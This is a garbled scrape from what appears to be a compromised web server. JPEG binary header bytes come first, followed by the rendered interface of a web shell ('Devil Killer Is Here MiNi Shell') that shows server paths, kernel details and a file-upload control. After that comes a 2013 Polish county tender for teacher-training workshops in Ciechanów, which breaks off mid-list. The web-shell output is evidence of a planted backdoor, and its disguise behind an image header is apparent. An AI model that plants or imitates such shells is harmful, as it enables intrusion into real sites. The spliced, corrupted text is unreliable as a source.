JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131031/445464-N-2013.html

<p class="kh_header"><b>Ciechanów: Przeprowadzenie warsztatów szkoleniowych  i  konsultacji grupowych dla 570 nauczycieli szkół i przedszkoli na terenie powiatu ciechanowskiego, mających na celu doskonalenie nauczycieli w wymiarze 1570 godz. ( 1 godz. = 45 minut zajęć) w ramach  projektu Doskonalenie szansą na rozwój, współfinansowanego ze środków Europejskiego Funduszu Społecznego realizowanego w Powiecie Ciechanowskim.</b><br>
<b>Numer ogłoszenia: 445464 - 2013; data zamieszczenia: 31.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ciechanowski , ul. 17 Stycznia 7, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723485, 6725415, faks 023 6722945.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów szkoleniowych  i  konsultacji grupowych dla 570 nauczycieli szkół i przedszkoli na terenie powiatu ciechanowskiego, mających na celu doskonalenie nauczycieli w wymiarze 1570 godz. ( 1 godz. = 45 minut zajęć) w ramach  projektu Doskonalenie szansą na rozwój, współfinansowanego ze środków Europejskiego Funduszu Społecznego realizowanego w Powiecie Ciechanowskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia.
Przedmiotem zamówienia jest przeprowadzenie  warsztatów szkoleniowych dalej jako WS i  konsultacji grupowych dalej jako KG dla 570 nauczycieli szkół i przedszkoli na terenie powiatu ciechanowskiego,mających na celu doskonalenie nauczycieli w wymiarze 1570 godz. (1 godz. = 45 min. zajęć) w ramach projektu Doskonalenie szansą na rozwój, współfinansowanego ze środków EFS realizowanego w Powiecie Ciechanowskim. 
Zamówienie składa się z 23 części - oferty doskonalenia:
I
Jak pomóc uczniowi osiągnąć sukces edukacyjny ?
W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz KG, obejmujących łącznie 97h w:
szkołach podstawowych: w Grudusku, Regiminie, Ojrzeniu, WS po 15h, w trzech modułach po 5 h oraz KG po 5 h dla grup od 8 do 25 osób,
Gimnazjum w Gąsocinie - WS po 15h, w trzech modułach po 5 h oraz  KG po  5 h dla grupy 10 osób,Gm. Przedszkolu w Gołotczyźnie - 12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy 7 osób wg autorskiego programu osoby prowadzącej.
Miejsce i termin realizacji: SP w Grudusku II-V 2014 r, SP w Regiminie II-III 2014 r. SP w Ojrzeniu XI-XII 2013 r, Gim.w Gąsocinie XI-XII 2013 r, Gm. Przedszk. w Gołotczyźnie II-III 2014 r.
Tematyka WS i KG:
- diagnozowanie mocnych i słabych stron (dziecka w przedszkolu, ucznia szkoły), 
- komunikacja interpersonalna, udzielanie informacji zwrotnej uczniom i rodzicom,
- praca z uczniem o specjalnych potrzebach edukacyjnych i z uczniem zdolnym (metody i formy pracy, indywidualizacja, strategie uczenia się, analiza opinii Poradni Psychologiczno-Pedagogicznych (dalej PPP) , opracowywanie dokumentacji dotyczącej diagnozy i pracy z dzieckiem).
II
Jak pomóc uczniowi osiągnąć sukces edukacyjny?
W ramach oferty Wykonawca zobowiązany jest do:
-  przeprowadzenia WS oraz  KG, obejmujących łącznie 80  h w:
gimnazjach w Gołyminie Oś., Nr 3 w Ciechanowie, Ościsłowie, WS po 15h, w trzech modułach po 5 h oraz KG po  5 h dla grup od 8 do 25 osób,
I LO w Ciechanowie  WS po 15h, w trzech modułach po 5 h oraz KG po 5 h dla grup od 8 do 25 osób,
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji:Gim. w Gołyminie Oś. III-V  2014;  Gim. nr 3  w Ciechanowie XI-XII 2013 r, Gim. w Ościsłowie II-III 2014 r, I LO w Ciechanowie  XI-XII 2013 r.
Tematyka WS i KG:
- diagnozowanie mocnych i słabych stron (dziecka w przedszkolu, ucznia szkoły), 
- diagnoza potrzeb i możliwości uczniów, w tym ich zainteresowań (szkoła ponadgimnazjalna), metody rozwijające zainteresowania,
- komunikacja interpersonalna, udzielanie informacji zwrotnej uczniom i rodzicom,
- praca z uczniem o specjalnych potrzebach edukacyjnych i z uczniem zdolnym (metody i formy pracy, indywidualizacja, strategie uczenia się, analiza opinii PPP, opracowywanie dokumentacji dotyczącej diagnozy i pracy z dzieckiem).

III
Ocenianie kształtujące.
W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 100  h w: SP w: Szulmierzu, Zeńboku, i Woli Wierzbowskiej, WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób,gimnazjach w:  Kraszewie, i Gimnazjum z Oddz.i Integr. nr 4 w Ciechanowie, WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób,wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP w Szulmierzu XI-XII 2013 r.; SP w Zeńboku II-IV 2014 r.; Gim. z 
Oddziałami Integracyjnymi nr 4 w Ciechanowie XI-XII 2013 r.; Gim. w Kraszewie XI 2013 - I 2014 r,  SP w Woli Wierzbowskiej III-IV 2014 r.
Zakres tematyczny WS obejmuje  wybrane elementy oceniania kształtującego: informacja zwrotna - w kierunku nauczyciel - uczeń, uczeń - nauczyciel, nauczyciel - rodzic, cele w języku ucznia, NaCoBeZu, samoocena, ocena koleżeńska; zastosowanie elementów OK w praktyce szkolnej na różnych zajęciach edukacyjnych w szkole podstawowej i gimnazjum.
KG oprócz zakresu tematycznego przewidzianego dla WS, obejmują:  
3 h  zajęć zgodnych z zasadami OK,  (w tym 2 h zajęć prowadzonych przez prowadzącego KG a następnie 1h omówienia zajęć z uczestnikami), 
2 h - moderowanie spotkania grupy nauczycieli poświęcone opracowaniu indywidualnych i zespołowych metod OK.

IV
Techniki uczenia się i metody motywujące do nauki.
W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 100  h w SP w:  Grudusku, Opinogórze G., Gołyminie 

Oś. oraz SP Nr 5 w Ciechanowie,  WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób,Gimnazjum w Opinogórze G.,  WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 14 osób, wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji:   SP w Grudusku  XI 2013 r.- I 2014 r.; SP w Opinogórze G. XI-XII 2013 r.; 

SP  Nr 5 w Ciechanowie  XI-XII 2013 r,  SP w Gołyminie Oś. XI-XII 2013 r., I-II 2014 r.; Gim. w 

Opinogórze G. XI 2013 r - III 2014 r. 
Tematyka WS i KG:
- poznanie technik i metod efektywnego uczenia się,
- projekt edukacyjny,
- metody motywujące do nauki,
- wykorzystanie metod aktywizujących na lekcjach poszczególnych przedmiotów,
- opracowanie katalogu metod aktywizujących i sposobów motywowania uczniów,
-  technologie informacyjno komunikacyjne, w dalszej części SIWZ jako TIK w motywowaniu uczniów do nauki,  
- strategie motywacyjne względem uczniów zdolnych oraz tzw. uczniów trudnych,
- metody budowania zaangażowania uczniów do osiągania wysokich wyników w nauce,
- wyposażenie nauczycieli w wiedzę z zakresu mnemotechnik (np. łańcuszek, cyfra-litera, wizualizacja,
skojarzenia, mapy mentalne, technika słów kluczowych, strategia pracy z tekstem, nowe techniki 
notowania, metody efektywnego powtarzania materiału).
-  wspieranie i motywowanie dziecka do nauki przez rodziców.

V. Techniki uczenia się i metody motywujące do nauki.

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 80  h w:
SP w:  Zeńboku, Kraszewie,  WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób,
gimnazjach  w Ościsłowie i Sońsku,  WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób, wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: Gim. w Ościsłowie XI-XII 2013 r. SP w Zeńboku  XI 2013 r -I 2014 r,  SP w 
Kraszewie XI-XII 2013 r.; Gim. w Sońsku I-II 2014 r.
Tematyka WS i KG:
- poznanie technik i metod efektywnego uczenia się w szkole podstawowej, gimnazjum,
- projekt edukacyjny,
- metody motywujące do nauki,
- metody aktywizujące na lekcjach poszczególnych przedmiotów,
- opracowanie katalogu metod aktywizujących i sposobów motywowania uczniów,
-  TIK w motywowaniu uczniów do nauki,  
- strategie motywacyjne względem uczniów zdolnych oraz tzw. uczniów trudnych,
- metody budowania zaangażowania uczniów do osiągania wysokich wyników w nauce,
- wyposażenie nauczycieli w wiedzę z zakresu mnemotechnik,
-  wspieranie i motywowanie dziecka do nauki przez rodziców.

 VI
Techniki uczenia się i metody motywujące do nauki.

 W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 97  h w:
SP w:  Humięcinie, Gąsocinie, Szulmierzu i Kołaczkowie, WS po 15h,  w trzech modułach po 5 h oraz  KG 

po  5 h dla grup od 7 do 25 osób,
Miejsko - Gm. Przedszkolu w Glinojecku,  12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy 10 osób
wg  autorskiego programu osoby prowadzącej warsztaty szkoleniowe i konsultacji.
Miejsce i czas realizacji:   SP w Humięcinie XI 2013 r. - I 2014 r. SP w Gąsocinie I - III 2014 r. SP w 

Kołaczkowie XII 2013 r. - II 2014 r. SP w Szulmierzu I-III 2014 r. M. - Gm. Przedszk. w Glinojecku 

II-III 2014 r.
Tematyka WS i KG:
- poznanie technik i metod efektywnego uczenia się w przedszkolu, szkole podstawowej,
- projekt edukacyjny,
- metody motywujące do nauki,
-  metody aktywizujące na lekcjach poszczególnych przedmiotów,
- opracowanie katalogu metod aktywizujących i sposobów motywowania uczniów,
-  TIK w motywowaniu uczniów do nauki,  
- strategie motywacyjne względem uczniów zdolnych oraz tzw. dzieci/uczniów trudnych,
- metody budowania zaangażowania uczniów do osiągania wysokich wyników w nauce,
- wyposażenie nauczycieli w wiedzę z zakresu mnemotechnik,
-  wspieranie i motywowanie dziecka do nauki przez rodziców.

 VII
Uczeń - aktywny uczestnik procesu uczenia się.

 W ramach oferty  Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 40  h w:     
SP w Humięcinie w wymiarze WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 7 osób,
Gimnazjum w Grudusku WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 12 osób,
wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji: SP w  Humięcinie II-V 2014 r.; Gim. Publ. w Grudusku  II-V 2014 r.
Tematyka WS i KG:
- angażowanie uczniów w doskonalenie procesów edukacyjnych,
-wdrożenie metod pracy zwiększających aktywność uczniów w procesach edukacyjnych,
- wdrażanie strategii służącej utrwalaniu zmian w praktyce nauczycieli.

 VIII
Oferta edukacyjna drogą do właściwej realizacji podstawy programowej.
 W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 97  h w:
SP w Opinogórze G. WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 15 osób,
gimnazjach w : Opinogórze G., Gimnazjum z Oddz. Integr. nr 4 w Ciechanowie, WS po 15h,  w trzech 

modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób,
Technikum nr 1 w Ciechanowie, w wymiarze 15 h, w trzech modułach po 5 h oraz   5 h KG dla grupy osób
Miejskim Przedszkolu nr 3 w Ciechanowie, 12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy 12 osób
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP  w  Opinogórze G. XI-XII 2013 r.; Gim.  w Opinogórze G. II-IV 2014 r, 

Gim. z Oddz. Integr. nr 4 w Ciechanowie II-III 2014 r, Tech. nr 1 w Ciechanowie III-V 2014r, Miejskie 

Przedsz. nr 3 w Ciechanowie I-III 2014 r.
Tematyka WS i KG:
- podnoszenie kompetencji z zakresu podstaw efektywnej pracy zespołowej, rozwijanie umiejętności 

interpersonalnych: skutecznej komunikacji, udzielania konstruktywnej informacji zwrotnej oraz 

planowania pracy zespołowej,
- innowacje pedagogiczne - procedury tworzenia, tworzenie opisu i planowanie ewaluacji,
- innowacyjne metody nauczania.
Warsztaty szkoleniowe w Miejskim  Przedszk. Nr 3 w Ciechanowie obejmą dodatkowo:
stosowanie nowatorskich metod pracy z dziećmi, poznanie najnowszych rodzajów zajęć muzyczno-rytmicznych 

dla dzieci w wieku od 2 - 5 lat w oparciu o wielokierunkową percepcję muzyki.

 IX
Wspieranie pracy wychowawców klas - bezpieczna szkoła.

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 100  h w szkołach podstawowych  w:  Glinojecku, w 

Sońsku, w SP z Oddz.  Integr. nr 7 w Ciechanowie, WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h 

dla grup od 8 do 25 osób,
technikach: nr 4  w Ciechanowie, nr 2 w Ciechanowie,  WS po 15h,  w trzech modułach po 5 h oraz  KG po  

5 h dla grup od 8 do 25 osób,
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP z Oddz. Integr. nr 7 w Ciechanowie XI-XII 2013 r,  SP w Glinojecku XI 

2013 r -I 2014 r, SP w Sońsku I-II 2014 r, Tech. nr 4 w Ciechanowie I-II 2014 r, Tech. nr 2  w 

Ciechanowie  III-IV 2014 r,
Tematyka WS i KG:
- podniesienia kompetencji podczas pracy w zespołach wychowawczych z wykorzystaniem metody warsztatowej 

oraz metody analizy indywidualnych przypadków,
- metody rozpoznawania potrzeb wychowawczych, zasady planowania i monitorowania oddziaływań 

wychowawczych,
- wypracowanie systemu współpracy w zespole nauczycieli - wychowawców klas oraz  opracowanie 

przydatnych dokumentów,
- umiejętność radzenia sobie z trudnymi zachowaniami uczniów,
- opracowanie narzędzi potrzebnych do pracy wychowawczej: ankiet, kwestionariuszy wywiadów z uczniami, 

zbiorów zasad, przykładowych kontraktów, procedury interwencji wychowawczych,
- współpraca z rodzicami w zakresie ujednolicenia oddziaływań wychowawczych.

 X
Postawy uczniowskie. Jak je kształtować ? 

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 77  h w:
SP z Oddz.  Integr. nr 7 w Ciechanowie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 

od 7 do 20 osób,
Gimnazjum w Grudusku WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 12 osób,
II LO w Ciechanowie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 19 osób,
Miejskim Przedszkolu nr 10 w Ciechanowie, 12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy 8 osób
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP z Oddz. Integr. nr 7 w Ciechanowie XI 2013 r - III 2014 r, Gimn. w 

Grudusku  XI 2013 r. - I 2014 r, II LO w Ciechanowie III-IV 2014 r,  Miejskie Przedszk. nr 10 w 

Ciechanowie III-IV 2014r.
Zakres tematyczny WS:
- komunikacja interpersonalna w pracy wychowawczej nauczycieli oraz  w relacjach nauczyciel - uczeń, 

nauczyciel-rodzic,
- warsztaty nt.Nauczyciel wobec trudnych  zachowań dzieci,uczniów, nabycie przez nauczycieli 

umiejętności w zakresie reagowania na trudne sytuacje wychowawcze (usystematyzowanie wiedzy w zakresie 

przepisów prawa w zakresie reagowania na trudne sytuacje wychowawcze),
- metody rozpoznawania potrzeb wychowawczych uczniów,
- zasady planowania i monitorowania oddziaływań wychowawczych,
- metody pracy wychowawczej z grupą klasową,
- podnoszenie umiejętności w zakresie podejmowania działań edukacyjnych sprzyjających kształtowaniu i 

uzyskiwaniu pożądanych postaw uczniów oraz sposobów motywowania ich do podejmowania proponowanych 

działań, 
-   współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw dzieci/uczniów,
- koncepcja pracy szkoły - sprecyzowanie systemu wartości, określenie modelu absolwenta,
- program wychowawczy oparty na przyjętym w szkole systemie wartości,
- integracja nauczycieli, uczniów, rodziców wokół zadań służących kształtowaniu postaw uczniów i 

rozwojowi szkoły. 
Konsultacje grupowe, prócz tematyki przewidzianej dla warsztatów, obejmują:
- wypracowanie kompendium wiedzy nt. metod pracy wychowawczej z grupą klasową -ABC wychowawcy: 

narzędzia do diagnozowania klasy, tworzenie zbiorów zasad, kontraktów, umiejętność prowadzenia rozmów z 

uczniem (w tym w przypadku trudnych zachowań) i rodzicem (w kontekście współodpowiedzialności za 

kształtowanie postaw uczniów),
- opracowanie procedur  modyfikacji trudnych zachowań uczniów,
- organizacja pomocy psych.-pedagog. dla dzieci z trudnościami wychowawczymi (praca  z dzieckiem 

autystycznym i z zespołem Aspergera).

 XI
Budowa koncepcji pracy szkoły.

  W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 40  h w:
Gimnazjum w Gołyminie Oś. WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 13 osób
I LO w Ciechanowie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób
wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji: Gim. w Gołyminie Oś. XI-XII 2013 r, I LO w Ciechanowie I-II 2014 r. 
Tematyka WS i KG:
- przygotowanie do samodzielnego diagnozowania potrzeb szkoły,
- tworzenie odpowiadającej potrzebom szkoły koncepcji pracy,
- procedura okresowego analizowania i modyfikowania koncepcji pracy szkoły,
- sposoby informowania społeczności lokalnej o koncepcji pracy szkoły.

 XII
Praca z uczniem zdolnym.

 W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 20  h w:
SP w Woli Młockiej WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 11 osób
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP w Woli Młockiej II-IV 2014 r,
Zakres tematyczny WS:
 - rozwijanie zdolności twórczych i zainteresowań uczniów
- planowanie różnych rodzajów zajęć zgodnie z efektami diagnozy zdolności twórczych,
- narzędzia diagnozy potrzeb rozwojowych uczniów, w tym zdolności twórczych i zainteresowań, na 

poszczególnych etapach edukacyjnych w szkole podstawowej,
- zasady opracowywania programu rozwijania zainteresowań i uzdolnień uczniów zgodnie z etapem 

nauczania.
KG,  prócz tematyki przewidzianego dla WS, obejmują: 
- wypracowanie przez nauczycieli narzędzi diagnozy zdolności twórczych i zainteresowań uczniów na 

poszczególnych etapach edukacyjnych.

 XIII
Praca z uczniem o specjalnych potrzebach edukacyjnych.

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 80  h w:
SP  w: Glinojecku,  Ojrzeniu i Gołyminie Oś., WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla 

grup od 8 do 25 osób
II LO w Ciechanowie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy od 19 osób
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP w Glinojecku II-IV 2014 r,  SP w Ojrzeniu III-IV 2014 r,  SP w Gołyminie 

Oś.  III-IV 2014 r,  II LO w Ciechanowie XI-XII 2013 r.
Zakres tematyczny WS:
- charakterystyka ucznia z różnymi typami niepełnosprawności (uczeń  z autyzmem, z Zespołem Aspergera, 

z lekkim upośledzeniem umysłowym, z niepełnosprawnością ruchową, z niedowidzeniem i niedosłyszeniem),
- analiza interpretacja opinii i orzeczeń, wielospecjalistyczna ocena poziomu funkcjonowania ucznia, 

formułowanie potrzeb ucznia, określanie form, sposobów i metod pracy z uczniem,
- zasady pracy z uczniami o specjalnych potrzebach edukacyjnych, w tym zakres i sposoby dostosowania 

wymagań edukacyjnych do aktualnych możliwości psychofizycznych ucznia,
- zwiększenie kompetencji w zakresie analizowania i dostosowywania metod  i form pracy zgodnie z 

indywidualnymi potrzebami uczniów ( praca z uczniem  z trudnościami i z uczniem zdolnym),
- współpraca z rodzicami uczniów mających opinie lub orzeczenie PPP. 
 KG  oprócz  tematyki przewidzianej dla warsztatów, obejmują:
analizę indywidualnych przypadków uczniów posiadających orzeczenia  o potrzebie kształcenia 

specjalnego; wypracowanie zasad pracy z uczniem niepełnosprawnym oraz zasad dostosowania wymagań 

edukacyjnych do jego indywidualnych potrzeb, w tym oceniania ucznia z uwzględnieniem jego typu 

niepełnosprawności
listę zasad pracy z uczniem niepełnosprawnym.

 XIV
Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet.
W ramach oferty doskonalenia Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 60  h w:
SP w Woli Wierzbowskiej WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 9 osób
gimnazjach: nr 3 w Ciechanowie, w Regiminie, WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla 

grup od 8 do 25 osób
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP w Woli Wierzbowskiej  XI-XII 2013 r,  Gim. nr 3 w Ciechanowie  I-III 2014 

r,  Gim. w Regiminie XI-XII 2013 r.
Tematyka WS i KG:
- praca z tablicą interaktywną, wykorzystanie portalu Scholaris,
- praktyczne włączanie narzędzi informatycznych do przygotowania i prowadzenie zajęć dydaktycznych,
- platforma edukacyjna (tworzenie, wykorzystanie w pracy dydaktycznej).

 XV
Projekt  edukacyjny w szkole.

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 20  h w:
III LO w Ciechanowie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 17 osób
wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji:  III LO w Ciechanowie XI 2013r. - I 2014 r.
Tematyka WS i KG:
- metoda projektu jako efektywny sposób rozwijania kompetencji kluczowych uczniów,
- wdrażanie projektów edukacyjnych.

 XVI
Współpraca szkoły ze środowiskiem lokalnym.

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 20  h w:
III LO w Ciechanowie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 17 osób
wg autorskiego programu osoby prowadzącej warsztaty szkoleniowe i konsultacje. 
Miejsce i czas realizacji:   III LO w Ciechanowie II-V 2014 r.
Tematyka WS i KG:
- umiejętność identyfikowania potrzeb środowiska,
- działania na rzecz wzajemnego rozwoju,
- korzystanie z zasobów środowiska w procesie nauczania i wychowania ,
- nawiązanie współpracy z podmiotami działającymi w środowisku,
- umiejętność identyfikowania potrzeb i szans rozwojowych szkoły możliwych do zaspokojenia we 

współpracy ze środowiskiem lokalnym.

 XVII
Rodzice są partnerami szkoły.

 W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 91  h w:
w SP w : Woli Młockiej,  Młocku WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 

25 osób
